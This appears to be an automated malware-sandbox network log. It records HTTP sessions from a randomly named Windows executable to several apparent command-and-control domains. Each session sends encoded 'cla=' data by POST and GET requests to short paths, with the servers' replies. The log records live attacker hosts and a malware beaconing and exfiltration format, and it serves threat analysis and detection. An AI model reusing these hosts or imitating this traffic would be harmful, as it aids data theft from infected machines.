                                                                                                             Nov 22, 2024 07:56:56.308432102 CET | 1236 | IN | Data Raw: 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 65 2c 22 2a 22 29 7d 29 7d 69 66 28 74 79 70 65 6f 66 28 63 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75 6c
                                                                                                            Data Ascii: d.source.postMessage(a?JSON.stringify(e):e,"*")})}if(typeof(c)==="object"&&c!==null&&"__uspapiCall" in c){var b=c.__uspapiCall;window.__uspapi(b.command,b.version,function(h,g){var e={__uspapiReturn:{returnValue:h,success:g,callId:b.callId}};d
                                                                                                            Nov 22, 2024 07:56:56.308471918 CET1236INData Raw: 22 6f 62 6a 65 63 74 22 26 26 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 77 69 6e 64 6f 77 5b 61 5d 21 3d 3d 6e 75 6c 6c 29 29 29 7b 77 69 6e 64 6f 77 5b 61 5d 3d 77 69 6e 64 6f 77 2e 63
                                                                                                            Data Ascii: "object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_gppstub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};window.cmp_addFrame("__cmpLocator");if(!("
                                                                                                            Nov 22, 2024 07:56:56.383389950 CET1236INData Raw: 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 74 74 65 69 63 61 70 69 74 61 6c 2e 6f 6e 6c 69 6e 65 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 64 57 55 32 57 58 68 33 4e 7a 4a 72 62 30 4e 49 61 7a 4a 6c 65 55 73 79
                                                                                                            Data Ascii: rc="http://www.matteicapital.online/sk-logabpstatus.php?a=dWU2WXh3NzJrb0NIazJleUsyV3l2VTF3aE5wY1duRlNmaFlMYmM0WDdKU3hnRElacDRONThTUmpsd0poZUJYWWFmYmJXUE1xSVZTbHJjQ2xCMW5ZaDIxUEo2TEJUc0tzYUxyU3Z6TnEyYzVVK0ZpY3VwcXhJN1dzbEUvK1ZOSC8=&b="+abp;docu


Session ID: 25
Source IP: 192.168.2.5
Source Port: 49994
Destination IP: 8.210.114.150
Destination Port: 80
PID: 2128
Process: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe

Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:57:02.505940914 CET | 610 | OUT | POST /rsvy/ HTTP/1.1
Host: www.llljjjiii.shop
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.llljjjiii.shop
Cache-Control: max-age=0
Content-Length: 204
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.llljjjiii.shop/rsvy/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Ascii: cla=m+7KIMtJ4/BT3KIg6gdk4TPghgCDUz0BonzPF5cM1Zjw1VwIPkTE4cfBMW0RJXN7Oge+aWHbyC3jErEbmu1IBv6Ry0of9Sfi5j674aH2beyUCwYr61h4scoLZ/tt0cC0o06lUd6x389l0X2Xnfd4Pm9Vj6bz1UtOJL628qkCI9tJ7jcMaCKbUe761LJFd6CbbJxftpY=
Nov 22, 2024 07:57:04.115753889 CET | 925 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 22 Nov 2024 06:57:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=8a3uj438f2kir6vkhmeb9c68f1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sessionid=8a3uj438f2kir6vkhmeb9c68f1; expires=Mon, 20-Nov-2034 06:57:03 GMT; Max-Age=315360000; path=/
Content-Encoding: gzip


Session ID: 26
Source IP: 192.168.2.5
Source Port: 50001
Destination IP: 8.210.114.150
Destination Port: 80
PID: 2128
Process: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe

Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:57:05.171899080 CET | 630 | OUT | POST /rsvy/ HTTP/1.1
Host: www.llljjjiii.shop
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.llljjjiii.shop
Cache-Control: max-age=0
Content-Length: 224
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.llljjjiii.shop/rsvy/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Ascii: cla=m+7KIMtJ4/BT2q4g8Bdk6zP/uACDOD0donvPF89X1M7w0x0IOlTE/cfBE20UNXNwOgTBaX7byCzjEoQbnddLQv6Trkodzyfi5j674eXYbeaUChIr7XZ/38oIJPttjMD9o06TUYba355l0WGXmKx3Em9T+KbiyHcdG6Smwap4YcRzz1tmAgCzH+XClYByMKjyBqhvz+OSJ5PNtdNHz/uCPS1n3lB2
Nov 22, 2024 07:57:06.801637888 CET | 925 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 22 Nov 2024 06:57:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=jhponootar5kt1v0atttbo1bv3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sessionid=jhponootar5kt1v0atttbo1bv3; expires=Mon, 20-Nov-2034 06:57:06 GMT; Max-Age=315360000; path=/
Content-Encoding: gzip


Session ID: 27
Source IP: 192.168.2.5
Source Port: 50004
Destination IP: 8.210.114.150
Destination Port: 80
PID: 2128
Process: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe

Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:57:07.839998007 CET | 1647 | OUT | POST /rsvy/ HTTP/1.1
Host: www.llljjjiii.shop
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.llljjjiii.shop
Cache-Control: max-age=0
Content-Length: 1240
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.llljjjiii.shop/rsvy/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 22, 2024 07:57:09.494505882 CET | 925 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 22 Nov 2024 06:57:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=i9s8d6s9sj3gcfedk170uo8aq3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sessionid=i9s8d6s9sj3gcfedk170uo8aq3; expires=Mon, 20-Nov-2034 06:57:09 GMT; Max-Age=315360000; path=/
Content-Encoding: gzip


Session ID: 28
Source IP: 192.168.2.5
Source Port: 50005
Destination IP: 8.210.114.150
Destination Port: 80
PID: 2128
Process: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe

Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:57:10.511018991 CET | 352 | OUT | GET /rsvy/?cla=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rRtv3mUECyzOywyqf8KPBYdutbjoA70JSrcAbMdNFzubz8Q==&jbeXk=EHbdQPuX HTTP/1.1
Host: www.llljjjiii.shop
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 22, 2024 07:57:12.240935087 CET | 1120 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 22 Nov 2024 06:57:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=lssgj5pdrsim94isfuk3kkdd96; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sessionid=lssgj5pdrsim94isfuk3kkdd96; expires=Mon, 20-Nov-2034 06:57:11 GMT; Max-Age=315360000; path=/
                                                                                                            Data Ascii: 268<html><head> <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" /> <script src="/public/javascript/jquery-2.2.3.min.js?v=" type="text/javascript"></script></head><body style="background-color: #6da5c3;"><img style='max-width: 400px;width: 100%;position: absolute;right: 0;top: 30%;left: 0;margin: 0 auto;' src="/public/image/404.png"/>...<h1 style='width: 400px;position: absolute;margin-left: -200px;margin-top: -80px;top: 50%;left: 50%;display: block;z-index: 2000;color:#FB7C7C;text-align: center'> 404 Not Found </h1>--></body></html>0


Session ID: 29
Source IP: 192.168.2.5
Source Port: 50006
Destination IP: 172.67.209.48
Destination Port: 80
PID: 2128
Process: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe

Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:57:17.701783895 CET | 616 | OUT | POST /huvt/ HTTP/1.1
Host: www.ampsamkok88.shop
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.ampsamkok88.shop
Cache-Control: max-age=0
Content-Length: 204
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.ampsamkok88.shop/huvt/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Ascii: cla=/z/07yxfDjX26e8ie9SvpT+r8joks215P61WbgN4tT6czc1jGRP9ma5KnJK6d8DQSxQCdWR9hwfZcY198eNuZFjRROls5bJIq/AswIqFleWqL45cV+3wQNOWu3ki1csvkYqsLSGTdN7HYOVVXPxroF4fPQyl17FOnu/0Bi6lL7NbXFY1C1YfwPCAjQDPQcxEijHeZtw=
Nov 22, 2024 07:57:18.847464085 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Fri, 22 Nov 2024 06:57:18 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lx6tld4bcQrQ9l%2BsJmRuAzfA2d2yfC9iTswCWaKBTuh1ASCuj%2FPmE2%2Bszg9%2FgeZOEVEanS1cSlHPGt%2ByeAY48dbfs%2FQBN7jfyYtnEYZxUHJEbE3vj0iezcVPdIX44K654Kil7FIA9w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e67064b5e907d16-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1769&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=616&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Ascii: 2a8Tk0B![$e)[(cY:*IJB4+c{wgG`v;B_g12)!!|nQ+<(Z6eZH+^/:d,$EICJ"%h/ EM\X$uQW-Z:HVY2EVD%Ub9H[gTRN0-9BJq7Kw!}~/'nx<=ZPatua{xx\qA5p/'8;{{gc/d&i:&qW4|MuI%30.OY*hLMfdN
                                                                                                            Nov 22, 2024 07:57:18.847489119 CET | 254 | IN | Data Raw: 0d f6 f7 1a 29 d8 9d 80 f9 b2 9e d1 f4 86 ce c1 c1 95 4b b0 fb b3 fb cb a3 45 01 92 0f 32 91 73 87 ba 7e db 8f ff 8b c2 dd b2 14 89 b3 97 ab 8c d7 8c f7 ed 3e 45 a2 e9 1c ea 3e 33 10 69 66 c3 9e 4f bd 95 e0 36 ab 57 c6 ae 73 f0 0a 65 6a bf 85 98
                                                                                                            Data Ascii: )KE2s~>E>3ifO6WsejFx]=Js!JPXCA$D\Q.df4Pn9$ggh A{1XQwXH*YJeT2cwNy/teY}Q@''
                                                                                                            Nov 22, 2024 07:57:18.847660065 CET | 21 | IN | Data Raw: 62 0d 0a e3 02 00 9d 21 bb 3f e5 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: b!?0


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            30 | 192.168.2.5 | 50007 | 172.67.209.48 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 22, 2024 07:57:20.368664026 CET | 636 | OUT | POST /huvt/ HTTP/1.1
                                                                                                            Host: www.ampsamkok88.shop
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.ampsamkok88.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 224
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Ascii: cla=/z/07yxfDjX24+MiS6+v4D+sgTok3G0+P6pWbkUntlicy9FjHTr92K5Ky5K7TcDbSxc8dX99hwLZcdJ97vNpYVjTdulukLJIq/AswIurleOqLLxcWf3zTNOVp3ki/8srkYqCLTb8dODHYOlVXbtsjF4jLQzAw4sXhty/BVfHYt55bTpfYXQ3jvu4zDL4BsQt4AXuH6kZQLcvzi3aEQQ1n5mxZPhF
                                                                                                            Nov 22, 2024 07:57:21.564651012 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 22 Nov 2024 06:57:21 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SID2QwSk%2BPOSiw0rW%2FIo2WX88yWRZ1Bznn1mOwHD5k05Idpzy7vlJygkc1qRm9xV0rg96Ip9R%2B4nGYALhARMUiMtLBgjjT1EejHi5nOq07qxpfY37KLKoXXbBRPV8B6fmoxplGKyEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e67065c3ac4558f-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1465&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=636&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Ascii: 2b3Tk0B!-J$e-k(cY:*IJB4+c{wgnN'ctp91!!|nQ+,(Z6eK*^/d4$EICJ"h/ EM\X$UQW-Z:HY2EVD%UbH[gTZV0-9\Jq/Kw!}/'nx<=ZPatua{xz\aA5p~ONx2e'cwr_NdiRJ21g41a\T<qS(=#g=4R
                                                                                                            Nov 22, 2024 07:57:21.564688921 CET | 264 | IN | Data Raw: 5b 01 73 b9 9a d2 f4 86 ce c0 c1 95 4b b0 fb a3 fb d3 a3 45 01 92 0f 32 91 73 87 ba 7e db 8f ff 8b c2 dd b2 14 89 b3 93 ab 8c d7 8c f7 fd 3e 45 a2 e9 0c ea 3e 33 10 69 66 c3 9e 4f bd a5 e0 36 ab 57 c6 ae 72 f0 0a 65 6a bf 85 98 c6 46 e5 73 0b 78
                                                                                                            Data Ascii: [sKE2s~>E>3ifO6WrejFsx]Js!JQXBA$D\Q.df4P5|iXm1XQwXJ*YJeT2cwN(teY}Q@'' S


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            31 | 192.168.2.5 | 50008 | 172.67.209.48 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 22, 2024 07:57:23.025753021 CET | 1653 | OUT | POST /huvt/ HTTP/1.1
                                                                                                            Host: www.ampsamkok88.shop
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.ampsamkok88.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 1240
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Nov 22, 2024 07:57:24.179091930 CET | 816 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 22 Nov 2024 06:57:24 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6cmUnu1IYDT74XUTHcoWoBgyN84S8VRCRHcyYhcPamaHDBHswDwex9jk5nYOuEadz5iefBNT8nKypGXeLQq%2F6iiRcw2PH0my%2FjhlaQFekEbFfF3dDwq8otLiYuC03r30nzlvSOENQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e67066c9e4d440d-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1530&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1653&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                                            Data Ascii: f
                                                                                                            Nov 22, 2024 07:57:24.179580927 CET | 692 | IN | Data Raw: 32 61 38 0d 0a 94 54 ef 6b db 30 10 fd 9e bf 42 0d a5 92 21 b5 d3 11 ba ad fe 01 6d 92 b2 42 92 96 2d 65 94 31 8a 2c 9d 63 15 45 f2 24 25 21 4b fc bf 0f db 69 9a 15 da b1 0f 06 49 f7 de bd bb d3 b3 a2 a3 c1 6d 7f fa 70 37 44 5f a6 e3 11 ba bb bf
                                                                                                            Data Ascii: 2a8Tk0B!mB-e1,cE$%!KiImp7D_Q4n LMe@yp^&kP<V(|]L~"ZuZQv(pH+raGAQ.9NhE\wEcbzhP34ZX@TahryN


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            32 | 192.168.2.5 | 50009 | 172.67.209.48 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 22, 2024 07:57:25.676951885 CET | 354 | OUT | GET /huvt/?cla=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPdmXJU5Nrv7tPj8ooy4ycuPqfNaJACPLoENW1kFMy7/pznQ==&jbeXk=EHbdQPuX HTTP/1.1
                                                                                                            Host: www.ampsamkok88.shop
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Nov 22, 2024 07:57:26.873251915 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 22 Nov 2024 06:57:26 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=brVa9GSdK4llpNGUeu5AxwXCeBEXy57MyT5MYTdg4oDXKzqXACGcz9QaGPFFSjhCOKj74tQoI0VOafq7vLVUDvFt5AU9Vs1D3U%2BVn0bL6g%2BooW1uuRSVXLg6PQv1VdYj6hA5UVJRow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e67067d8fa6422e-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=354&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Ascii: 4e5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'
                                                                                                            Nov 22, 2024 07:57:26.873310089 CET | 800 | IN | Data Raw: 38 65 36 37 30 36 37 64 38 66 61 36 34 32 32 65 27 2c 74 3a 27 4d 54 63 7a 4d 6a 49 31 4f 44 59 30 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69
                                                                                                            Data Ascii: 8e67067d8fa6422e',t:'MTczMjI1ODY0Ni4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            33 | 192.168.2.5 | 50010 | 209.74.77.109 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 22, 2024 07:57:32.527621984 CET | 613 | OUT | POST /6gtt/ HTTP/1.1
                                                                                                            Host: www.gogawithme.live
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.gogawithme.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 204
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.gogawithme.live/6gtt/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Ascii: cla=fEoUs3xbtCHRPbBdjaSJq4iTsRrzP/fkLZusXun+Vmrv2LXofGyFY+eisSJ97eZQ2auoUbyclO6AFuMj8orvd9DVYi3dvdV5Enjv/nrmKXadAPNJ1k4L76GJ0mRNRB09fbTSHNU/gDdWhvXyoA1EZqKj8V6BosDUWhfj51UHTTWs9Yf5Qjt222cohVGw1WGa6bzkSW0=
                                                                                                            Nov 22, 2024 07:57:33.739012003 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 22 Nov 2024 06:57:33 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            34 | 192.168.2.5 | 50011 | 209.74.77.109 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 22, 2024 07:57:35.197118044 CET | 633 | OUT | POST /6gtt/ HTTP/1.1
                                                                                                            Host: www.gogawithme.live
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.gogawithme.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 224
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.gogawithme.live/6gtt/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 66 45 6f 55 73 33 78 62 74 43 48 52 4f 37 52 64 6d 39 4f 4a 74 59 69 53 69 78 72 7a 64 2f 66 6f 4c 5a 69 73 58 76 54 75 4a 41 54 76 33 75 37 6f 65 46 71 46 66 2b 65 69 6e 79 4a 38 31 2b 5a 68 32 61 6a 43 55 61 4f 63 6c 50 61 41 46 75 63 6a 2f 62 44 73 50 64 44 58 54 43 33 54 79 4e 56 35 45 6e 6a 76 2f 6e 4f 37 4b 58 43 64 41 66 39 4a 76 41 4d 49 32 61 47 4b 38 47 52 4e 56 42 30 35 66 62 54 38 48 4f 51 56 67 47 42 57 68 73 44 79 6f 52 31 44 51 71 4b 6c 68 46 37 4f 75 63 32 4d 5a 41 76 31 31 6e 52 6d 4e 54 57 73 34 75 75 54 4b 42 6c 65 6c 57 77 51 78 47 4f 48 6b 6d 6e 7a 67 34 6a 55 4d 42 68 62 2b 67 6b 59 75 31 6c 63 54 69 42 72 47 76 73 74 7a 54 41 54
                                                                                                            Data Ascii: cla=fEoUs3xbtCHRO7Rdm9OJtYiSixrzd/foLZisXvTuJATv3u7oeFqFf+einyJ81+Zh2ajCUaOclPaAFucj/bDsPdDXTC3TyNV5Enjv/nO7KXCdAf9JvAMI2aGK8GRNVB05fbT8HOQVgGBWhsDyoR1DQqKlhF7Ouc2MZAv11nRmNTWs4uuTKBlelWwQxGOHkmnzg4jUMBhb+gkYu1lcTiBrGvstzTAT
Nov 22, 2024 07:57:36.404454947 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 22 Nov 2024 06:57:36 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
